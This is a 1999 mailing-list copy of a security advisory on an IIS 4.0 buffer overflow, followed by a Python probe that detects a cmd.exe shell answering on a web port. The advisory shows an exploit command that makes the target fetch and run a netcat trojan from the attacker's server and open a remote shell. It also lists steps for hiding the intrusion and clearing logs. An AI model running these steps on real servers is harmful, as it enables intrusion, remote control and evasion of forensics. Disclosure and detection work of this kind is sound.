Retina vs. IIS4, Round 2 - The Exploit -- I guess there isn't much to say........

---------


Subject: Retina vs. IIS4, Round 2 - The Exploit -- I guess there isn't much to say........
From: Ozan Ozkara (colony@istanbul.linux.org.tr)
Date: Fri 15 Oct 1999 - 16:34:14 EET DST


Retina vs. IIS4, Round 2 - The Exploit

We contemplated releasing this exploit and decided to do it after Microsoft
neglected to give it the attention it deserves. After the fifth day of
reporting the bug to Microsoft, they stopped responding to our e-mails. On
the 8th day we felt that it was our duty to make our voice heard.

Here Is Why.

We are a full disclosure security team, and we were not working under any
non-disclosure agreements with anyone. Our responsibility to our clients and
the whole network community is to disclose as many details as possible; this
is how other developers can pick up where we stopped and explore the exploit
in different directions, and this is the way we can contribute to the security
community and keep software vendors working hard at producing more robust
products. This exploit demonstrates the seriousness of the hole. YES, this is
a very serious hole and needs to be given the attention it deserves. If our
team starts hiding the facts, we'll be no better than a software vendor that
rushes insecure products to market. So here it goes...

 The Target:

Let's say for this example we are targeting some random Fortune 500 company.
Take your pick. We want to pretend this company has some "state of the art"
security. They are locked down behind a Cisco Pix, and are being watched
with the best of Intrusion Detection software. The server only allows
inbound connections to port 80.

Let's Dance.

We've crafted our exploit to overflow the remote machine and download and
execute a trojan from our web server. The trojan we are using for this
example is ncx.exe. Ncx.exe is a hacked-up version of netcat.exe. The
hacked-up part of this netcat is that it always passes -l -p 80 -t -e
cmd.exe as its argument. That basically means netcat is always going to bind
cmd.exe to port 80. The exe has also been packed slightly to make it
smaller. Instead of a 50k footprint it's 31k. So we run our exploit:

--------------------------------------------------------------------
--------------------------------------------------------------------
    X:\Code>iishack example.com 80 ourserver.com/ncx.exe
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------

Data sent!

Note: Give it enough time to download your trojan.

X:\Code>telnet example.com 80

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]
C:\>exit

-------------------------------------------------------------------
-------------------------------------------------------------------

Note: Once we type exit in the telnet session our trojan exe, ncx.exe, is
unloaded and is no longer listening on port 80. Therefore the web service
can restart and everything can seem back to normal. Now the example above
was a somewhat quick demonstration of how this could be used. Some things
were left out because this advisory is big enough as it is.

Note: Now that we have proven the severity of this advisory we no longer
feel that it is necessary to distribute the exploit in a binary form.
However the source code is still available for download.

We are still committed to the full disclosure on this hole and we will
continue to help the security community in making the Internet more secure.

We will not provide support on using the exploit or compiling the source.

 iishack.asm


 
 To unsubscribe from the list, send the message
          unsub linux
 to listeci@bilkent.edu.tr.
   Please do not use MIME / HTML / Turkish accented characters when writing to Listeci.
  List archive address: http://listweb.bilkent.edu.tr/
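The telnet transcript in the advisory shows the tell-tale state of a host taken over this way: port 80 answers with a cmd.exe banner and a C:\> prompt instead of an HTTP response, because ncx.exe has bound cmd.exe to the one port the firewall lets through. The following is an added example (not code from the eEye advisory or from this list): a small probe that connects to a host and port, sends a harmless GET, and classifies whatever comes back. The two banners, the host names and the local throwaway listener used to exercise it are constructed for offline use and are not captured from any real system.

```python
import socket
import sys
import threading

# Constructed sample banners (not captured from any real host). The first is
# what a healthy IIS listener returns on port 80; the second reproduces the
# cmd.exe banner the advisory's telnet transcript shows once ncx.exe has
# bound cmd.exe to port 80 in place of the web server.
HTTP_BANNER = (b"HTTP/1.1 200 OK\r\n"
               b"Server: Microsoft-IIS/4.0\r\n"
               b"Content-Length: 0\r\n\r\n")
CMD_BANNER = (b"Microsoft(R) Windows NT(TM)\r\n"
              b"(C) Copyright 1985-1996 Microsoft Corp.\r\n\r\n"
              b"C:\\>")


def classify_banner(data: bytes) -> str:
    """Decide what kind of service answered from the first bytes it sent.

    Returns "http" for an HTTP status line, "cmd_shell" for a Windows
    command-interpreter banner or prompt, "silent" for no data, else "unknown".
    """
    head = data.lstrip()
    if head.startswith(b"HTTP/"):
        return "http"
    if b"Microsoft(R) Windows NT" in head or b"C:\\>" in head:
        return "cmd_shell"
    if not head:
        return "silent"
    return "unknown"


def probe(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect, send a harmless request, read whatever comes back, classify it.

    A real web server answers the GET; a cmd.exe bound by ncx.exe prints its
    banner regardless of what we send, so the same probe works for both.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        chunks = []
        try:
            while len(b"".join(chunks)) < 4096:
                chunk = s.recv(1024)
                if not chunk:          # peer closed the connection
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass                       # an interactive shell just waits for input
    return classify_banner(b"".join(chunks))


def serve_once(banner: bytes) -> int:
    """Start a throwaway local listener that answers one connection with
    `banner` and then closes; returns the bound port.

    This exists only so the probe can be exercised offline; it stands in for
    the target and is not part of the advisory's tooling.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        with conn:
            try:
                conn.recv(1024)        # drain the probe's request
            except OSError:
                pass
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return port


if __name__ == "__main__":
    # Usage: python probe80.py example.com 80
    target_host, target_port = sys.argv[1], int(sys.argv[2])
    print(target_host, target_port, probe(target_host, target_port))
```

Two caveats follow directly from the advisory's own transcript. The check is point-in-time: once the attacker types exit, ncx.exe stops listening and the scheduled task restarts inetinfo, so port 80 looks normal again and the window in which this probe reports "cmd_shell" is only while the shell is up. Second, the payload works by having the target fetch ncx.exe from the attacker's web server, which a firewall that filters only inbound traffic to port 80 permits; blocking outbound connections from the web server breaks that delivery step, though it does nothing about the overflow itself.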



---------

This archive was generated by hypermail 2b25.